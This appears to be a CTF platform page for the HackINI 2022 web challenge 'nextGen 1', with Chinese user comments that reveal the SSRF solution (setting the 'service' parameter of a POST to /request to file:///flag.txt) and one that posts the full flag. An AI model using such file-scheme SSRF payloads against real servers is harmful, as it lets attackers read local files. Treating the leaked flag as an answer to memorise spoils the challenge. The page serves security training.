nextGen 1WEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2022
题目作者: 未知
一  血: L010
一血奖励: 0金币
解  决: 1103
提  示: Flag is in the `/flag.txt` file of the web server
描  述:
> Simple monitoring app.
评论
ahsjezyt 8天前

shellmates{***}

回复 0

bugku111222 21天前

为什么一直响应400

回复 0

Zhumeng 7月前

简单的ssrf 通过网络抓包 会发送一个向request去发送一个post请求 提示说读取flag.txt 猜测是ssrf 有个这个 service=网址 这里可以把他换成 service=file://127.0.0.1/flag.txt 即可读取flag

回复 0

红薯味橘子 8月前

见作者:MiracleWolf的http://47.98.239.98/2023/11/18/ctf-webnextgen-1%e3%80%812/详解

回复 1

小白帽来挖个漏洞 8月前

题解:https://blog.csdn.net/guanrongl/article/details/142931716

回复 0

差距从何而起 9月前

shellmates{1T_W4S_4_qu1T3_3s4y_expl01tabL3_$$Rf}

回复 0

MOCHAOLIN 10月前

POST /request HTTP/1.1 Host: 82.157.146.43:17387 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gz

回复 0

yun20231227 11月前

改为POST请求 /request ?service=file:///flag.txt

回复 0

我孤身一人 1年前

环境貌似不行了

回复 1

xiaoxiao972521 1年前

service=file:////flag.txt

回复 0

WriteUp

image
hopeinhand

1 金币

评分(4)

解题动态

luckylian 攻破了该题 13小时前
umico8832 攻破了该题 13小时前
17335918325 攻破了该题 19小时前
小白ctf 攻破了该题 1天前
2495280533 攻破了该题 1天前
swewjk 攻破了该题 1天前
buuble123 攻破了该题 2天前
人闲桂花落 攻破了该题 2天前
wsmemail 攻破了该题 3天前
18516952839 攻破了该题 4天前
渴死的鱼 攻破了该题 6天前
麦克凌云不会ctf 攻破了该题 7天前
ahsjezyt 攻破了该题 8天前
周围有鬼 攻破了该题 10天前
yanghe 攻破了该题 10天前
1345736679 攻破了该题 10天前
paovspao 攻破了该题 12天前
百叶i 攻破了该题 13天前
bugkinn 攻破了该题 14天前
abcfdafda123 攻破了该题 14天前
问题反馈